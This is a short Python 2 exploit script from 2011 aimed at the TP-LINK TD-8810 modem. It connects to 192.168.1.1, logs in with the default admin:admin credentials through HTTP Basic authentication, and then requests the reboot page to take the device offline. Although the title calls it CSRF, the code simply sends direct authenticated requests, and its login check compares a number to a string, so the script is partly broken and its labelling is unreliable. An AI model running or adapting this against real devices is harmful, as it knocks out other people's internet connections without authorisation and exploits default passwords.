#!/usr/bin/python # #[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit #[+]Date: 01\09\2011 #[+]Author: C4SS!0 G0M3S #[+]Version: TD-8810 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # from socket import * from time import sleep from base64 import b64encode import os,sys if os.name == 'nt': os.system("color 4f") os.system("cls") os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit") else: os.system("clear") print ''' TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit Created by C4SS!0 G0M3S E-mail louredo_@hotmail.com Blog net-fuzzer.blogspot.com ''' request = ( "GET / HTTP/1.1\r\n" "Host: 192.168.1.1\r\n" "User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n" "Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n" "Accept-Encoding: gzip,deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Connection: keep-alive\r\n" "Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password ) request2 = ( "GET /rebootinfo.cgi HTTP/1.1\r\n" "Host: 192.168.1.1\r\n" "User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n" "Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n" "Accept-Encoding: gzip,deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Connection: keep-alive\r\n" "Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password ) print "\t\t[+]Connecting in the Modem TP-LINK TD-8810..." sleep(1) s = socket(AF_INET,SOCK_STREAM,0) s.connect(('192.168.1.1',80)) print "\t\t[+]Sending HTTP Request..." sleep(1) s.send(request) data = s.recv(100000) s.close() if (int(data.split("\r\n")[0].split(" ")[1]) == "200") == 0: print "\t\t[+]User Logged successfully." sleep(1) print "\t\t[+]Sending the request to shutdown the modem..." sleep(1) s = socket(AF_INET,SOCK_STREAM,0) s.connect(('192.168.1.1',80)) s.send(request2) print "\t\t[+]Exploit Sent wait your Modem Reboot... :)" sleep(1) s.close() else: print "\t\t[+]I can't log in your modem. Maybe Password Or Username is Wrong." sleep(1)